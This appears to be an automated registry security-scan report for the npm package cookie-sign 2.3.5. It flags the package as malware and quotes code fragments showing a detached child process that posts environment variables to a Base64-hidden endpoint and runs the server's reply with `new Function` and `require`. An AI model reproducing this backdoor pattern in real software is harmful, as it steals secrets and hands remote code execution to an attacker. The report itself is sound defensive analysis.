registry  /  cookie-sign  /  2.3.5

cookie-sign@2.3.5

This document describes the management of vulnerabilities for the project and all modules within the organization.

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Importing the package is inert, but calling its exported middleware starts a detached Node child. That child sends environment data to a concealed remote endpoint and executes server-supplied JavaScript with `require` access.

Static reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
Application code invokes the exported middleware from `index.js`.
Impact
Remote operator can receive environment data and run arbitrary Node code in the consuming application's context.
Mechanism
Detached environment exfiltration followed by remote code execution.
Attack narrative
A consumer that calls the exported middleware triggers `index.js` to spawn and detach `lib/initializeCaller.js`. The child decodes a hard-coded endpoint, POSTs its environment object, then compiles the HTTP response with `new Function` and invokes it with `require`. This gives the endpoint operator a staged payload channel that can load filesystem, process, or network modules and execute arbitrary code outside the caller's visible request flow.
Rationale
Direct inspection confirms a concrete runtime exfiltration and remote-code-execution chain, not merely suspicious primitives. Absence of install hooks limits the trigger to middleware invocation but does not mitigate the malicious behavior.
Evidence
package.jsonindex.jslib/initializeCaller.js
Network endpoints1
ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` exports middleware that always spawns `lib/initializeCaller.js` when invoked.
  • `lib/initializeCaller.js` decodes and POSTs to `https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df`.
  • The POST body is `{ ...process.env }`, harvesting the initializer's configured environment values.
  • Remote response text is executed through `new Function("require", response.data)` with Node `require` access.
  • The child is detached, ignores stdio, and is unrefed, hiding activity from the caller.
Evidence against
  • `package.json` defines no preinstall, install, or postinstall lifecycle hook.
  • No source evidence of AI-agent control-surface mutation was found.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 17 file(s), 53.3 KB of source, external domains: github.com

Source & flagged code

7 flagged · loading source
index.jsView file
3const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants');
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L3
3Cross-file remote execution chain: index.js spawns lib/initializeCaller.js; helper contains network access plus dynamic code execution. L3: const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants'); ... L37: function runBackgroundTask(args) { L38: const scriptPath = path.resolve(__dirname, './lib/initializeCaller.js'); L39:
High
Cross File Remote Execution Context

Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.

index.jsView on unpkg · L3
matchType = malicious_source_fingerprint_signature signature = 3522c2fe164c56ca signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = chai-as-doc@2.3.5 matchedPath = index.js matchedIdentity = npm:Y2hhaS1hcy1kb2M:2.3.5 similarity = 1.000 shingleOverlap = 12 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
lib/initializeCaller.jsView file
28.then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Eval

Package source references dynamic code evaluation.

lib/initializeCaller.jsView on unpkg · L28
13const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); L15: const apiHeaderValue = atob(process.env.DEV_SECRET_VALUE); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/initializeCaller.jsView on unpkg · L13
2L3: const axios = require("axios"); L4: const process = { ... L12: (async function initializeCaller(..._args) { L13: const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/initializeCaller.jsView on unpkg · L2
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

6 High3 Medium3 Low
HighChild Processindex.js
HighEvallib/initializeCaller.js
HighSame File Env Network Executionlib/initializeCaller.js
HighCross File Remote Execution Contextindex.js
HighBase64 Obscured Urllib/initializeCaller.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings